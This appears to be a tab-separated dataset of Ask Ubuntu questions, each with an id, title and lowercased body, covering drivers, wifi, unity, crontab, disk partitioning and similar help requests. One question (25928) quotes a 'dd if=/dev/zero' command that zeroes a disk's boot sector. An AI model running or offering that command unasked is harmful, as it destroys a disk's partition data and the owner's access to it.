25884	will desktopcouch be stable in natty ?	this is an important question for me . i have to decide to whether to use desktopcouch or pure couchdb . will desktopcouch be stable in natty ? up to this point , i 've had too many problems with desktopcouch . dc does not start , dc does not sync , and so on .
25885	is it possible to make the desktop background transparent or otherwise hidden ?	i 'm running ubuntu in a virtual machine via virtualbox . i have the seamless mode turned on , which is pretty cool . however , if i move an ubuntu window around quickly , i can see the redraw of the ubuntu background quickly before it 's hidden by virtualbox again . this is n't a huge deal , but i 'd like to fix it , if possible . i see two possible options that do n't involve changing virtualbox code : make the ubuntu desktop transparent make the ubuntu desktop hidden entirely is it possible to do either ? i know that compiz fusion has/had a feature to do this for their cube effects , but i do n't think that i can run this on the vm . and , even if i could , i do n't want to run those services for this one small feature . my host os is windows server 2008 r2 .
25898	how to interpret this crontab command ?	i know that if i wrote in crontab -e following command 01 04 * * * somecommand then it will run somecommand at 4:01am on every day of every month . what happens if i wrote * * * * * somecommand ? will it run somecommand every single minute ? will this syntax work also ? and it is possible to use special strings like @ reboot , @ daily , etc as it is explained here . at what time of the day somecommand will be executed if i write @ daily somecommand command ?
25899	flash lags after getting back from suspend	i have a problem i on my device hp dv4 with i3 processor after getting back from suspend the flash player on youtube or any other website lags on full screen ... audio goes perfect but video is lagging i tried some solutions from google nothing worked ... so am seeking the experts help here thanks
25900	ralink-based usb wi-fi adapter drops connection after some time	i have an intellinet wireless 150n usb adapter ( based on a ralink rt3070 chip ) in an ubuntu 10.10 installation . the problem is , that it 's dropping the connection after being connected to a wireless network for 10 - 20 minutes . i have to unplug it and plug it in again every time this happens . i read somewhere , that i need to blacklist some chipset modules , but i do n't how ? and which ralink modules i have to blacklist ? thanks for your answers ! : d
25901	moving min/max/close buttons back to right hand side for full screen windows	how do i move the minimuze/maximise/close buttons to the right hand under unity , for maximised windows ? i 've used gconf-editor to change /apps/metacity/general/button_layout to move them to the right hand side for windows which are n't maximised , but once maximised it moves back to the left hand side .
25905	is it possible to execute an action by double clicking on the desktop ?	is it possible to execute an action ( a command or a bash script ) by double clicking on the desktop ? i want to emulate the function that fences does in windows systems : by double clicking the desktop , you show/hide the icons/folders you have in the desktop . the script is not the problem , what i want to know is how to execute it when double clicking on an unused area of my desktop .
25908	how to mount my ipod touch 4g ?	when i plug in my 32gb ipod touch 4g , it mounts a 1gb drive . rhythmbox does not react , neither does banshee . any ideas how to copy my music ? the output of df with ipod plugged is : filesystem 1k-blocks used available use % mounted on /dev/sda1 28834716 4347480 23022512 16 % / udev 1026788 288 1026500 1 % /dev none 1026788 1496 1025292 1 % /dev/shm none 1026788 204 1026584 1 % /var/run none 1026788 0 1026788 0 % /var/lock none 1026788 0 1026788 0 % /lib/init/rw /dev/sda6 96124904 62709456 28532496 69 % /home and for sudo fdisk -l also with ipod plugged : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes disk identifier : 0x0009b4b0 device boot start end blocks id system /dev/sda1 * 1 3647 29294496 83 linux /dev/sda2 3648 15927 98639100 5 extended /dev/sda5 3648 3769 979933+ 82 linux swap / solaris /dev/sda6 3770 15927 97659103+ 83 linux
25914	is there a music player like winamp ?	i 'm looking for a music player similar to winamp .
25917	left mouse button stops working	the left mouse button stops working after 5 or 10 minutes of running ubuntu 10.10 . it is a logitech mx 1000 wireless usb mouse . also is there a way to emulate the left mouse click on the keyboard ? mouse pointer move fine , right button works , wheel works .
25919	hp quicktouch media keys worked with livecd but not after install	the `` touch sensitive keys '' , that control volume and media worked great out of the box when i was running ubuntu on a livecd , but they are totally unresponsive after installation . hp pavilion dv9740us with dual-boot vista ultimate and ubuntu 10.10 intel core 2 duo t5450 / 1.67 ghz nvidia geforce 8600m gs @ 512mb 3g ddr2 ram ,
25921	assigning keyboard shortcuts to multi-monitor configurations	using ubuntu 10.10 . i have an external screen and frequently move my computer in and out of the room . is there a way of avoiding manually configuring via nvidia-settings every time i need to take my laptop out of my room ? would like to be able to press ctrl + 1 and have only the laptop screen active , ctrl + 2 for the external only , and ctrl + 3 for twinview .
25923	how do i get a digital personal u 4500 fingerprint scanner working ?	i have an external usb-based fingerprint scanner . on ms windows it is used to save fingerprints as images . are there any drivers and softwares to get it working on ubuntu ? edit : the device i use is `` digital persona u are u 4500 ''
25926	shared location for all python interpreters	is there a shared location for all python interpreters ? i want to install a module so it becomes avaiable to all interpreters ( 2.6 , 2.7 , 3.1 ) . thanks you in advance , rubik
25927	no gui boot ; startx error , i suspect no filesystem corruption	till yesterday , my ubuntu 9.10 was working fine . i had watched a movie using vlc . i had also charged my ipod using the laptop . today , when i started it , i automatically booted into command line . there seems to be no filesystem corruption etc as i can view/open ( text ) files . before the cli appeared , the screen blinked with a cursor , then the white ubuntu logo flashed , and then i got the cli login prompt . after logging in , if i try startx , to start gnome , i get the following error after a few seconds : giving up xinit : no such file or directory ( errno 2 ) : unable to connect to x server xinit : no such process ( errno 3 ) : server error* the same error comes up , even if i use sudo , or if i change my directory to '/ ' before using startx , and also when , from the grub , using the recovery mode option to load into cli , and then trying startx . on trying command 'xinit ' , i get '' server error '' also , on trying gdm , i get 2 errors . i can not connect to the internet in this state . thanks for any help . i am using dell inspiron 1440 , no special graphics card .
25928	how to install mbr with maverick or karmic	i have been using ubuntu since 9.10 . now maverick crashed and my mbr is wrecked . i have run dd if=/dev/zero of=/dev/sdb bs=512 count=1 on advice from another ubuntu user but now i can only install any windows release and no ubuntu . how do i completely erase the mbr and then use an ubuntu live cd or another hdd with ubuntu on to install a linux-only mbr please . i am rather new at the technical side of linux and have bandwidth shortage problems so i ca n't download large amounts of data . thanks in advance !
25930	install packages with unmet dependencies	i am trying to install some applications but some of them fail to install . the three applications i tried are vim , emacs and gnome-do . i am using ubuntu 10.10 installed as a guest os in virtualbox . the kernel version installed is 2.6.35-26 . the error i got is : alvinsim @ ubuntu : /etc/apt $ sudo apt-get install emacs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : emacs : depends : emacs23 or emacs23-lucid but it is not going to be installed emacs23-nox but it is not going to be installed e : broken packages what is wrong and how do i fix this ? thanks .
25934	non-standard installation ( installing linux from linux )	so , here 's my setup . i have one partition with the newest version installed , a second partition with an older version installed ( as a backup just in case ) , a swap partition that both share , and a boot partition so the bootloader does n't need to be setup after each upgrade . partitions : sda1 ext3 /boot sda2 ext4 / ( current version ) sda3 ext4 / ( old version ) sda4 swap /swap sda5 ntfs ( contains folders symbolically linked to /home on / ) so far it has been a very good setup . i can modify the boot loaders for new installs without messing with the mbr . adding my personal files ( from the /home partition ) is as easy as creating some symlinks in my home folder ( even on a windows install ) . here 's the issue . i 'd like to be able to deploy an installation in the 'current version ' partition to overwrite the 'old version ' partition effectively making it the new 'current version ' . the goal here is to do the install with no usb drives , external hard drives , or cd copies . update : here are the steps to deploy an install from within ubuntu using debootstrap step one : format sda3 ( the partition with the old copy of linux that 's being overwritten ) i used gparted to format it as ext4 from within the current linux install . how this is done varies based on what tools you prefer to use . step two : mount the newly formatted partition ( we 'll call the mount ubuntu for simplicity ) sudo mkdir /mnt/ubuntu sudo mount -o -loop /dev/sda3 /mnt/ubuntu step three : get debootstrap sudo apt-get install debootstrap step four : mount the install disk ( replace ubuntu.iso with the name if your install disk ) sudo mkdir /media/cdrom sudo mount -o loop ~/ubuntu.iso /media/cdrom step five : install the os using debootstrap ( replace fiesty with the version you 're installing and amd64 with your processor 's architecture ) sudo debootstrap -- arch amd64 fiesty /mnt/ubuntu file : /media/cdrom the settings here varies . while i loaded debootstrap using an install iso , you can also have debootstrap automatically download and install if with a repository link ( while most of these repositories contain debian versions i 'm still not clear as to whether ubuntu has similar repositories ) . here a list of the debian package repositories and their mirrors . this is how you 'd deploy debootstrap if you were doing it directly from a repository : sudo debootstrap -- arch amd64 squeeze /mnt/debian http : //ftp.us.debian.org/debian here 's the link that i primarily used to figure out the steps needed . update 2 : i 've removed the info about my initial failed attempt and added the steps to accomplish this so this question may be useful for others who attempt this in the future .
25941	encrypted replication between normal couchdb and ubuntu one ?	this is a very special question . currently i 'm starting to develop a new online shop using python ( flask ) . i want to use couchdb to store ( and sync ) new orders . but couchdb does not encrypt the replication as far as i know . is it possible to use python to get authentication with oauth an start a replication via https : //couchdb.one.ubuntu.com between couchdb and the ubuntuone server ?
25951	get tor and irssi working together	hi i am trying to get tor working with irssi . the directions at the bottom of this page freenode install link say to : ~/.irssi $ tor mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion feb 12 04:26:51.101 [ notice ] tor v0.2.1.29 ( r318f470bc5f2ad43 ) . this is experimental software . do not rely on it for strong anonymity . ( running on linux x86_64 ) feb 12 04:26:51.101 [ warn ] command-line option 'p4fsi4ockecnea7l.onion ' with no value . failing . feb 12 04:26:51.101 [ err ] reading config failed -- see warnings above . or add it to the torrc file and reload irssi .irssi $ cat /etc/tor/torrc |grep 10.40.40 mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion this is a paste from within irssi after running $ torify irssi [ 04:33 ] math : :bigint : could n't load specified math lib ( s ) , fallback to math : :bigint : :fastcalc at /usr/local/share/perl/5.10.1/crypt/dh.pm line 6 [ 04:33 ] [ 04:33 ] *** irssi : loaded script cap_sasl so i thought it was a cpan module issue . cpan [ 1 ] > install math : :bigint this was also done for fastcalc and retried with force install . what am i doing wrong ? thanks
25954	is it possible to use more than two monitors ?	is it possible to use more than two monitors in ubuntu ? if so , which graphics cards are known to work for example with three monitors in ubuntu ?
25955	how can i see my keyboard layout in the panel ?	how can i see my keyboard layout in the panel in ubuntu 10.10
25961	how do i install a .tar.gz ( or .tar.bz2 ) file ?	i have downloaded tar.gz files . but i do n't know how to install it . how do i install this kind of file ?
25964	how to check if clipboard contents have changed from a script , other than polling ?	any scripting language will do , to check when the clipboard ( both primary and clipboard ) contents change , so that specific actions can be executed .
25966	how can i switch between fglrx and ati drivers ?	how can i switch between fglrx and ati ( open source ) drivers without uninstalling fglrx ? the thing is i 'm using fglrx on a daily basis , because it 's better for movies -- os driver displays annoying horizontal line while playing movies . fglrx also does this , but it 's less visible . that 's only disadvantage of os driver . when i want to plug in external monitor with different resolution than my laptop 's lcd i have to use open source driver , because fglrx ca n't display two different resolutions at the same time . i can uninstall fglrx , but it 's rather inconvenient to do this all the time . i 've noticed that when i 'm using fglrx there is xorg.conf file and when i uninstall it , then the file is missing . so my question is how to switch between them ? it 'll be perfect if i could do this without restarting my computer either . i 'm using ubuntu 10.10 , laptop/netbook msi u250 .
25967	hamachiâ˛ configuration file ... where is it ?	i recently installed hamachiâ˛ and haguichi on my 10.10 machine . it works , but it loses its connection every few minutes and i have to reconnect . i looked into this , and apparently i need to set the keepalive in the configuration file to 100 . this should n't be a hard task , so i looked for the hamachi directory . i checked the obvious place : /home/username/.hamachi ... but this directory does n't exist . ( yes , i did enable hidden files . ) after doing a file search for hamachi , it returned nothing either . i 'm in the dark here , what am i missing ?
25968	why gnome desktop services work simultaneously with unity desktop ?	after i log into unity-2d i see gnome panel and some other services working along side with unity services and i can not get rid of these services . besides , unity panel gets locked sometimes and i have to logout and login . why ?
25970	what book should i read to learn how to deal with networking issues ?	i run into wireless router and networking issues very often . i 'd like to finally just read a book on how to trouble and diagnose problems , using tools like ifconfig , editing files like /etc/network/interfaces , and whatever . any recommendations ?
25974	how do i change the `` default '' password	here 's my problem . when i log in i 'm beeing asked for a password connecting to the internet which is strange because i 'm the only user and the admin . i have auto log in and it never asks for passwords , ( except when i do administrative tasks . ) i have looked in the menu ( system -- > preferences , but i ca n't find any topic that say 's passwords or similar . the only place where i have found a way to change my password is my user ( ( system -- > preferences -- > user and groups ) . i did try to take screenshots but nothing happened , which also is strange . i 'm running ubuntu 10.04 lts desktop on my asus 1201n ( 12 '' ) .
25976	networkmanager connection shortcut	i proposed to implement this feature in http : //brainstorm.ubuntu.com/idea/27164/ , but it was marked as already implemented . could someone shed light on how i can do it ? i would like a shortcut to a specific connection ( vpn or broadband ) on my panel ( one click connect ) .
25979	adding a indicator / panel in unity panel	in gnome panel we could add a notification indicator by doing `` add to panel '' . how to do the same in unity 2d ? well what i mean is how to add additional indicators like weather , rss ... that seems to be missing as i can not right click on the panl and add one .
25981	which numbers does fdisk show ?	i have run sudo fdisk -l and have got the following information : disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders units = cylinders of 16065 * 512 = 8225280 bytes this utility shows the whole size of the hard disk ( 120034123776 bytes ) and its number of heads ( 255 heads ) , sectors per track ( 63 sectors/track ) and number of cylinders ( 14593 cylinders ) . multiplying heads x sectors per track x number of cylinders we must have number of sectors in the disk . 255 x 63 x 14593 = 234436545 having in mind that every sector is of size 512 bytes , we have 234436545 x 512 = 120031511040 in fact , 120031511040 ! = 120034123776 , therefore , the question is : does fdisk shows incorrect information or there is something that i have missed in my calculations ?
25983	hardware divers option is not there	i just installed the newest version of ubuntu ( 10.10 ) and i am trying to get the appropriate drivers installed for the nvidia ion . however there is no system > administration > hardware drivers option in the toolbar . does this not exist in this version of ubuntu ? do you know of any good links to installing the right drivers for the nvidia ion on ubuntu ? thanks in advance !
25987	how to dump disk sectors ?	i want to see the content of the sector 0 ( mbr ) of my hard drive . it is possible ?
25995	how can i automatically create a list of files and folders in a given folder in libreoffice calc ?	how can i automatically create a list of files and folders in a given folder in libreoffice calc ? i 'd like it to have as much info as possible ( size , name , folder hierarchy ... ) sorted in nice little cells . i 'd rather not dump it to a file using ls and then trying to sort it manually : it creates an awful output .
25996	can i add a proprietary wireless driver to a liveusb stick ?	i 'm looking to try out natty with a liveusb stick , but i 've and internet access problem . i 've only wireless internet access ( mifi dongle ) and my laptop has a broadcom wireless adapter ( bc4312 ) which needs a proprietary driver . i was wondering if there was any way of adding the wifi drivers to liveusb stick after i 've created it using the startup disk creator in my maverick install ?
26001	how do i find the .desktop information for a given binary ?	given the path to an executable ( say /usr/bin/gvim ) , how can i find the gnome .desktop file for that application ? i 'm futzing around in python , so a python-specific answer would be most helpful .
26005	how to properly set up sun 's jdk ?	i 'm trying to manually install the sun jdk package ( i have my reasons , do n't bother asking why ) . i 've successfully extracted the .bin file into /usr/lib/jvm/jdk1.6.0_23 , but the problem is the path variable . i added this line to the /etc/environment file : java_home= '' /usr/lib/jvm/jdk1.6.0_23 '' and added java_home/bin to the path variable , but the os still does n't recognise the command java , says it 's not installed and offers me gcj and openjdk . there was another way by using java-package and converting the .bin to .deb installer , but unfortunately that package is not available on/for maverick , so i ca n't do it that way . how can i make the path variable work and is there anything else required apart from the environment variables to make it all work ? when i try to use the update-java-alternatives -l command , it says the following : awk : can not open /usr/lib/jvm/*.jinfo ( no such file or directory ) jdk1.6.0_23 /usr/lib/jvm/jdk1.6.0_23 what should be the name of the file and the contents of it ?
26008	filenames in the apt cache directory	why the packages in the directory /var/cache/apt/archives/ have names like : *x11proto-damage-dev_1 % 3a1.2.0-1_all.deb* where the `` strange '' in this case is `` % 3 '' . in fact , if i download it manually from the firefox the package has the name `` normal '' . thanks
26011	are there any plans to create a standard based on libunity ?	in the last few month and maybe even years , ubuntu and canonical often were criticised for developing software and desktop components without talking to other groups in the free software community . i do n't want to comment on this topic , but i see problems arising with creating a `` proprietary '' solution for displaying indicators and progressbars with a launcher like unity . in the world of free and open desktop environments we often try to standardize parts and libraries or write specifications to increase collaboration between different desktops . we have the instrument of http : //freedesktop.org and a lot of specifications are getting implemented by the major desktop environments . in this context , proposing a standard for those indicators would be a great step towards better interoperability between desktops . these indicators represent a great feature on the linux desktop and i 'm sure that other projects like awn , docky , etc . would pick them up . with the great market share of ubuntu , canonical is in a position to propose it as a standard and encourage projects to implement it . thank you in advance , sebastian billaudelle
26016	authorization pop-up requested by http : //localhost:51675 every time i run firefox	using ubuntu 10.04 . whenever i run firefox i get a pop up requesting authorisation . it says 'a user name and password are being requested by http : //localhost:51675 . the site says `` server '' i have tried all passwords i know and nothing is accepted . if i click 'cancel ' it disappears but re-appears after about 5 minutes . this whole 'experience ' is accompanied by a great deal of hard disc activity . list of extensions can anyone help with this ?
26017	active web site as gnome background	is there a way to put an active website , such as gmail , as your desktop background in gnome , running ubuntu 10.10 64-bit ? ms win calls it `` active desktop '' .
26018	failed to get i915 symbols , graphics turbo disabled error on boot	whenever i boot my laptop , i see this message and it makes the boot process very slow as my screen stays black for a long time before this message appears . it shows just for a split second but today it got worst when my system could n't boot and stuck on this error , i did several reboots but still could n't pass this boot error message , then after sometime it fixed itself and now i can use my system as normal . i did n't pay much attention to the error when it was there for just a split second and making my boot process slow , but now that it has stopped me from booting into my system , i would like to know why this error occurring . error -- ... failed to get i915 symbols , graphics turbo disabled ... .
26019	acer aspire 5740 ( model ms2286 ) , do i have bluetooth ?	i have an acer aspire 5740 laptop and it has a hardware button for enabling and disabling bluetooth next to the button for toggling wifi . but when i go to system- > preferences- > bluetooth it says `` no bluetooth adapters present '' .
26030	10.10 boots to command line login prompt	i recently installed ubuntu 10.10 on a computer that was previously running 10.04 ( that worked fine ) . now , each time i boot up , it starts up in a command line login prompt . i can login and it stays at the command line ( as expected ) . i can then manually start gdm with sudo start gdm and it works fine . i can also enable compiz ( using proprietary nvidia drivers ) so i 'm reasonably confident that it 's not a driver problem ( at least not in the sense that the drivers just flat out are n't working ) . interestingly , if i leave it at the command prompt without logging in , after about 5 or 10 minutes , gnome starts up on its own . i 'm not sure what is causing this . this is what dmesg | tail gives me after a manual start of gdm : [ 15.664166 ] nvrm : loading nvidia unix x86_64 kernel module 270.18 tue jan 18 21:46:26 pst 2011 [ 15.991304 ] type=1400 audit ( 1297543976.953:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/share/gdm/guest-session/xsession '' pid=990 comm= '' apparmor_parser '' [ 16.606986 ] eth0 : link up , 100mbps , full-duplex , lpa 0xcde1 [ 18.798506 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 26.740010 ] eth0 : no ipv6 routers present [ 90.444593 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 189.252208 ] audit_printk_skb : 21 callbacks suppressed [ 189.252213 ] type=1400 audit ( 1297544150.218:19 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1876 comm= '' apparmor_parser '' [ 189.252584 ] type=1400 audit ( 1297544150.218:20 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=1876 comm= '' apparmor_parser '' [ 351.159585 ] lo : disabled privacy extensions
26033	can i use kde plasma widgets in gnome ?	i would like to use some kde plasma widgets but do n't want to install kde and do n't want to lose my current gnome setup .
26038	touchpad not working	i am using ubuntu 10.10 , and i have an ibm thinkpad t43 that the touchpad buttons do n't work . for example i do n't have a right click and the left click is on the right . button . can someone help me to correct this problem . thanks ,
26040	why is gnu screen slow to scroll in a vertical split region ?	on my ubuntu , gnu screen is very slow when scrolling in a vertically split region ( the one you create with ctrl-a | . but tmux does n't have this problem . why is this ?
26042	can a single nautilus window be started with multiple tabs ?	when i fist start nautilus i invariably open five favourite tabs.. i 've tried multiple uris from the command line , but it opened multiple windows . is it possible to somehow do this via command-line ? ...
26043	can i reprioritize the queue in ubuntu one ?	some relatively small text files on my netbook that i use every day 8 hours/day are a week out of sync . u1sdtool -- waiting-content shows a huge number of photos on the list to be uploaded before one of the text file to be downloaded . is there a way to move the text file up to get it processed sooner ? seems like it has been taking weeks for the photos to synchronize .
26045	how can i make banshee re-encode flac to ogg vorbis when copying to my player ?	i have most of my music in flac on my large storage device , and would like to automatically re-encode it in ogg vorbis when copying it to my portable audio player ( sansa fuze v2 ) . i have set my fuze to mtp mode and told banshee to encode to ogg vorbis with quality 4 in the device properties dialog for the fuze ( i would use msc mode , but do n't have an encoding option in the device properties when i do that ) . however , when i copy music to the device , either by dragging it from the music library or by syncing a playlist , the full flac files are copied rather than transcoded and written as oggs . how can i get my banshee setup re-encoding the audio ? if stackexchange supported bonus points , i 'd give bonus points for a solution that only re-encoded music that was already losslessly encoded , but i do n't think that 's possible .
26046	newly installed applications not shown in application menu or panel	i just installed some application called wmgtemp that shows live cpu temperatures via synaptic package manager in ubuntu 10.10 . but i can not find it in application menu or add to panel . how can i find it to run ? thanks !
26047	how do i find all of my software sources ?	broken software dependencies are often caused by incompatible third party repositories . i am asked to provide a list of software sources ( also known as software repositories ) . how can i quickly get a list of software sources ?
26049	where to find log file for booting information	there are two very quick screens of errors shown after i choose ubuntu in the screen of grub and before the scrren of ubuntu icon . i was wondering where to find the log file of the start information/errors ? thanks !
26050	possible to vertically or horizontally tile several open windows ?	in ubuntu 10.10 , is it possible to vertically or horizontally tile several open windows , just like in windows ? thanks !
26053	prevent service brltty and qemu-kvm from starting	so , i do arduino development on my system to program arduinos using the ftdi usb programming interface ( if you have no idea what this means do n't worry ) . the issue arises because the ftdi interface uses tty to communicate and it conflicts with one of the default ubuntu services . the default service in question is called brltty ( which enables braille accessibility for people with impaired vision ) . considering that i do n't have any particular use for this service and it 's annoying to stop it manually ( using 'service brltty stop ' ) after i restart my system ... where would i configure this ( or any ) service to prevent it from loading on startup ? note : i also have this issue with qemu-kvm conflicting with virtualbox .
26054	how to restart wifi interface without rebooting ( it drops connection ) ?	i boot into ubuntu and it connects to the wifi network fine . after about 10-15min the dns stop resolving any website and a couple of minutes later network-managers tells me that i 'm disconnected and tries to reconnect constantly to my router and fails to do it . upon ubuntu restart everything works fine for the first 10-15min again . when i boot into mac os x everything is fine with the same connection ! how do i restart wifi interface ? sudo ifdow wlan0 just tells me that wlan0 is not configured and wlan0 does n't appear in /etc/network/interfaces either , which i find strange ... . ( unless network-manager is doing it behind my back ) .
26056	where are gnome keyboard shortcuts stored ?	i usually load a new version for every release to keep my os fresh while preserving the last version on another partition as backup . i also employ a lot of custom key mappings . i 've figured out how to transfer the majority of my configuration across systems so far but i ca n't figure out where the custom keyboard shortcut mappings are stored . does anybody know where gnome puts these ? are there separate user config ( i.e. , ~/ ) and system config ( i.e . /etc ) files ?
26060	computadora no arranca ( computer does n't start up )	two weeks ago i made an update and when it finished , it asked for a reboot . never again booted , when i turn on the pc , the grub appears , offering me , start windows or ubuntu . when i start ubuntu this appeared : try ( hd0,0 ) : ntfs5 : no wubilder try ( hd0,1 ) : ntfs5 : somebody can help me , with that ?
26062	how to understand kernel choice at startup	i was wondering if the kernel choice during startup is equivalent to ubuntu release choice ? for example , i have installed 10.10 . during startup , i can choose two kernels : 2.6.32 and 2.6.35 . does 2.6.32 mean 10.04 and 2.6.32 mean 10.10 ? will applications installed under one kernel be also installed for other kernels available during startup ? thanks !
26063	how to control cpu frequency	on lenovo t400 and ubuntu 10.10 , i am using cpu frequency scaling monitor 2.30.0 on the panel to show and control cpu frequency . my cpu frequency by default will change according to load . but i want to make cpu work at the lowest level and so i choose 800 mhz in cpu frequency scaling monitor . after a few seconds , however , it automatically changes back to powersave or performance mode which has automatic adjustment to cpu frequency . i was wondering how to actually make cpu work at the lowest level ? thanks ! ps : on acer aspire 5000 and ubuntu 8.10 , i can use cpu frequency scaling monitor to control cpu frequency as i wish .
26068	how do you mute from the command line ?	how do you mute the sound system from the command line ?
26072	not able to install ubuntu 'can not mount /dev/loop0 '	i am try to install ubuntu 10.10 download from http : //www.ubuntu.com/desktop/get-ubuntu/alternative-download . iso image burnt to a cd and i boot from this cd . but i am not able to install because of some error 'input/output error can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs' so please let me know how to solve this .
26078	firefox downloaded files permissions	my umask is 0022 , but when i download a file ( using firefox 40b11 ) it is created with umask 0026 ( -rw-r -- -- - ) . no clue where the issue is , if i 'm even asking in the right forum . i 'm on mint 10 ( sorry , there is no `` askmint '' ) , gnome desktop . i 'd like downloaded files to be -rw-r -- r -- so they are shareable without having to change permissions every time .
26080	is there any fix for ati hd 4350 with unity ?	i love the unity interface ... so i installed the interface in my desktop pc and i installed the ati official drivers , i recently bought an ati hd 4350 , and the interface starts but very sluggish and when i open an app , it just frezees constanly , even the title bars from the windows look distorsionated . thanks for the answers .
26089	moving windows between separate x screens	is it possible to move a window that was opened on screen `` a '' ( not workspace , but separate x screen ) to screen `` b '' ( with or without additional tools which are n't provided by ubuntu ) ? i have an nvidia card with proper drivers installed . i 've tried using xinerama / twinview , but if one of these option are enabled ( in /etc/xorg.conf ) flash videos in chromium ( like on youtube or vimeo ) does n't play nicely ( clicking full screen plays the video , but not in fullscreen ) . furthermore sometimes windows pops up on my second screen ( which is an lcd tv usually turned off ) which is inconvenient . disabling xinerama / twinview solves these problems , but it would be nice to move windows back and forth between the two screens .
26092	how to detect/monitor the hosts/urls being accessed ?	does anyone know about software that can detect or monitor host / url are being accessed by ubuntu ? i want to see what host/url are beeing accessed by installed software or by my internet browser .
26093	setting up fastcgi on an ubuntu server ( socket file permissions issue )	i am trying to set up mod_fcgid on my server . part of the requirement is that apache needs to create a socket file for mod_fcgid . i specified the folder for apache to write the socket data to : /var/run/apache2/fcgid i then specified this file in my fcgid.conf file as follows : socketpath /var/run/apache2/fcgid/sock i then changed the owner of the folder to www-data ( the apache user ) and gave the owner full permissions to the folder and its contents . i was able to run my test fcgi app then . when i rebooted the machine , y fastcgi app no longer worked . after some investigation , i found that ownership of /var/run/apache2/fcgid has been reset to root , and with permission reset to 700 i have the following questions : is there something specific about the /var/run folder ? why is the permissions being reset after a reboot ? should i move my socket file to another location ( in case root automatically takes ownership of contents in this folder for security reasons ? ) i am running ubuntu 10.0.4 lts 64 bit
26094	what is default password ?	what is the difference between default and login ? and what does default keyring mean ? when i run some applications ( emphaty etc ) , unlock keyring window launched first , then it requires me password . why ? this is a screen-shot when i run emphaty . why does it require me a password ? it 's a just messenger . it makes me crazy . i was able to find this window . i guess this windows could give me a solution . before trying something to fix it , i 'd like know about what they are . please explain them to me . p.s my login password is not equal to default password now .
26101	how to setup and use the vim-rails plugin ?	how do i setup and use the vim-rails plugin ? i have installed it by running sudo apt-get install vim-rails . what do i do next to enable the plugin ?
26102	will unity 2d hide the launcher when windows are maximized ?	if `` one of the design goals of unity is to reduce the clutter of the desktop , another is to use space more efficiently . '' then why not hide the multi-color launcher when your windows are maximized on a small laptop ? so i can see it just when i 'm going to use it . the desktop looks very cool when applications are not maximized by the way : )
26104	will there be an ubuntu serif font in the future ?	since 10.10 we have the wonderful new ubuntu sans serif font . if everything goes well 11.04 will bring a great looking new monospace font . it would only be a logical step to also develop a serif font ! this way , the ubuntu experience would get its definite touch . it could for example give a very special web experience as proposed and supported in this post , by covering the three major font families . now of course the question remains , are there any plans for this ?
26106	make long click act like a right click ?	just got my netbook edition of ubuntu working with my tablets touch screen about 3 seconds ago ... but straight away , i 've noticed something - is it possible to make the right click menu show up when i press and hold left click , like on my win 7 partition ? now if you 'll ecuse me im just gon na go and get mouse gestures working ...
26114	is it possible to change the order of icons in the indicator applet ?	is it possible to change the order of icons shown in the indicator applet ? with tomboy indicator , weather indicator , clipboard-manager indicator , ubuntu one and dropbox indicators and a battery status indicator in addition to the classic messages indicator and sound menu indicator my indicator applet becomes a little bit messed up , sorting the icons would help a lot ...
26115	i3 wm with auto internet connectivity and a gnome panel	i wan na use i3 as wm with a gnome-panel on the bottom . but when i try to start the gnome-panel , i3 crashes . so how is it possible to run both ? another question is : how can i connect to the internet ( over wifi and cable ) when i3 starts ? in standard i get no connection after starting ( and waiting some time ) . do i need a static configuration or is there a better/other possibility ? best regards
26117	ca n't change folder background	i tried to change via dragging from the backgrounds and emblems window , but the icon just goes back to that window rather than changing the folder background.however , i can change the task bar by this drag-n-drop . probably it is something about changing ownership permission ? if so how to change that ? in /home/mashruf/.gconf/apps/nautilus/preferences/ % gconf.xml file it says : , should i change this file ? how ? < ? xml version= '' 1.0 '' ? > < gconf > < entry name= '' click_policy '' mtime= '' 1297597800 '' type= '' string '' > < stringvalue > single < /stringvalue > < /entry > < entry name= '' default_folder_viewer '' mtime= '' 1297597336 '' type= '' string '' > < stringvalue > list_view < /stringvalue > < /entry > < entry name= '' media_autorun_x_content_open_folder '' mtime= '' 1297534321 '' type= '' list '' ltype= '' string '' > < /entry > < entry name= '' media_autorun_x_content_ignore '' mtime= '' 1297534321 '' type= '' list '' ltype= '' string '' > < /entry > < entry name= '' media_autorun_x_content_start_app '' mtime= '' 1297534321 '' type= '' list '' ltype= '' string '' > < li type= '' string '' > < stringvalue > x-content/software < /stringvalue > < /li > < /entry > < entry name= '' start_with_location_bar '' mtime= '' 1297300028 '' type= '' bool '' value= '' true '' / > < entry name= '' side_pane_view '' mtime= '' 1297269334 '' type= '' string '' > < stringvalue > nautilustreesidebar < /stringvalue > < /entry > < entry name= '' navigation_window_saved_maximized '' mtime= '' 1297600306 '' type= '' bool '' value= '' false '' / > < entry name= '' navigation_window_saved_geometry '' mtime= '' 1297600306 '' type= '' string '' > < stringvalue > 964x608+59+2 < /stringvalue > < /entry > < entry name= '' sidebar_width '' mtime= '' 1297390418 '' type= '' int '' value= '' 192 '' / > < /gconf >
26120	my network applet thingy has dissapeared	in system - > preferences - > startup applications i have nm-applet -- sm-disable ticked . i do n't know why its not showing up after boot .
26125	permission denied when trying to download a torrent ?	i want to know the solution to this and resume my downloading . i am running ubuntu 10.10 .
